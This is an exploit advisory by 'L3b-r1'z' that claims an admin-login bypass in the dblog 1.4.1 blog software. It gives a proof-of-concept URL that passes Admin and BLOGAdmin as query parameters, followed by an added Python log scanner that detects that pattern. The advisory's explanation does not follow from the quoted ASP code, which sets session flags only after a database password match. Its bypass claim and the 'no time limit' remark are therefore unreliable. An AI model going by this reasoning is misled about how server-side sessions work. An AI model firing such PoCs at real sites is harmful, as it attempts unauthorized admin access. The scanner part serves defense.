# -------------------------------- #
Author   : L3b-r1'z
Date     : 3/6/2012
Title    : dblog Insecure Session \ Bypass Admin Vulnerability
Version  : 1.4.1
Download : http://www.dblog.it/sito/download.asp
Dork     : N\A
# -------------------------------- #
This proof of concept code was written for educational purposes only. Use it at your own risk. The author will not be responsible for any damage.
# -------------------------------- #
1) Bug
2) P0c
# -------------------------------- #

1) Bug :

The vulnerable file is admin/controllo.asp. Lines 10 and 11 read the submitted credentials:

    FUserID   = Request.Form("UserID")
    FPassword = Request.Form("Password")

Request.Form here is like $_POST in PHP. Now let's look at the code below it :)

#### Start ####
' Excerpt from admin/controllo.asp. The outermost If, whose Else / End If
' appear at the bottom of this excerpt, begins before it and is not shown.
If NOT RSAutori.EOF Then
    RSAutori.MoveFirst
    If RSAutori("Password") = FPassword Then
        ' Login succeeded: the session flags are filled from the DB row only
        Session("BLOGNick") = RSAutori("Nick")
        Session.TimeOut = 60
        If RSAutori("Admin") = True Then
            Session("BLOGAdmin") = True
        Else
            Session("BLOGAdmin") = False
        End If
        Response.Redirect "default.asp"
    Else
        ' Wrong password: clear the session and send the user back to login
        Session("BLOGNick") = ""
        Session("BLOGAdmin") = False
        Response.Redirect "login.asp"
    End If
Else
    ' No matching user
    Session("BLOGNick") = ""
    Session("BLOGAdmin") = False
    Response.Redirect "login.asp"
End If
Else
    Session("BLOGNick") = ""
    Session("BLOGAdmin") = False
    Response.Redirect "login.asp"
End If
#### End ####

Session.TimeOut is 60, which means a logged-in admin can stay on the page for 60 minutes only; but when we bypass the login we don't have any time limit :D

Look at:

    If RSAutori("Admin") = True Then
        Session("BLOGAdmin") = True

If the user's Admin flag is true, Session("BLOGAdmin") is set to true, and then:

    End If
    Response.Redirect "default.asp"

redirects to the admin page :D. In the Else branches, BLOGNick and BLOGAdmin are set to false and the user is redirected to login.asp :D

# -------------------------------- #

2) P0c :

http://domain.tld/admin/login.asp?Admin=True&&BLOGAdmin=True

You will see the admin panel :)

# -------------------------------- #
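The advisory's PoC works by supplying the session flag names (Admin, BLOGAdmin) as query-string parameters. A defender can spot that pattern in web server logs. The following scanner is an added example, not part of this advisory or of dblog; it assumes an IIS-style W3C log with seven space-separated fields (date, time, client IP, method, URI stem, URI query, status), and the sample lines it scans are constructed for the example.

```python
from urllib.parse import parse_qsl

# Constructed sample log lines (W3C extended format as IIS writes it).
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2012-03-06 10:01:12 203.0.113.7 GET /admin/login.asp - 200
2012-03-06 10:01:40 203.0.113.7 POST /admin/controllo.asp - 302
2012-03-06 10:02:05 198.51.100.9 GET /admin/login.asp Admin=True&&BLOGAdmin=True 200
2012-03-06 10:02:06 198.51.100.9 GET /admin/default.asp - 200
2012-03-06 10:05:00 192.0.2.44 GET /default.asp id=12 200
"""

# Parameter names that correspond to server-side session flags in dblog's
# login code; a client has no legitimate reason to send them in a URL.
SESSION_PARAMS = {"admin", "blogadmin", "blognick"}


def parse_line(line):
    """Split one W3C log line into a dict; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 7:
        return None
    date, time, ip, method, stem, query, status = parts
    if query == "-":          # IIS writes '-' when there is no query string
        query = ""
    return {"ts": f"{date} {time}", "ip": ip, "method": method,
            "stem": stem, "query": query, "status": int(status)}


def is_session_injection(entry):
    """True when a request under /admin/ carries a session-flag parameter."""
    if not entry["stem"].lower().startswith("/admin/"):
        return False
    # keep_blank_values keeps parameters with empty values; the empty segment
    # produced by '&&' in the PoC URL is skipped by parse_qsl itself.
    params = parse_qsl(entry["query"], keep_blank_values=True)
    return any(name.lower() in SESSION_PARAMS for name, _ in params)


def scan(log_text):
    """Return the parsed entries that look like session-flag injection."""
    hits = []
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is not None and is_session_injection(entry):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["stem"]}?{hit["query"]}')
```

Matching is case-insensitive on both the path and the parameter names, since Classic ASP's Request collection is case-insensitive and the PoC's exact spelling is not the only one that would work. The same check can be applied to POST bodies if those are logged.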